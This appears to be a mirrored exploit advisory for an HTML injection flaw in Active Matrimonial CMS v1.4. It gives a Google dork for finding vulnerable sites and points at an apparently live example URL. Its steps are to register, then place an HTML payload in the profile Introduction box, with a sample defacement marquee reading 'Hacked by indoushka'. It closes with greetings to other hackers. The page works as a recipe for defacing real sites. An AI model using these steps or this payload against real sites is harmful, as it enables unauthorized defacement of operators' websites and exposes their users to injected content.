Active Matrimonial CMS v 1.4 HTML inject Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1464804 漏洞类型
发布时间 2019-01-31 更新时间 2019-01-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019010301
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
====================================================================================================================================
| # Title     : Active Matrimonial CMS v 1.4 HTML inject Vulnerability                                                             |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | 
| # Vendor    : https://activeitzone.com/                                                                                          |  
| # Dork      : "Copyright © 2019 Active Matrimonial CMS - All Rights Reserved "                                                   |
====================================================================================================================================


poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Register new member .

[+] go to edit your profil http://xywars.com/home/profile

[+] in Introduction box , put your code or use this code for test :

<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>
</tr>
<td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a>
</tr>

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |        
                                                                                                                                      |
=======================================================================================================================================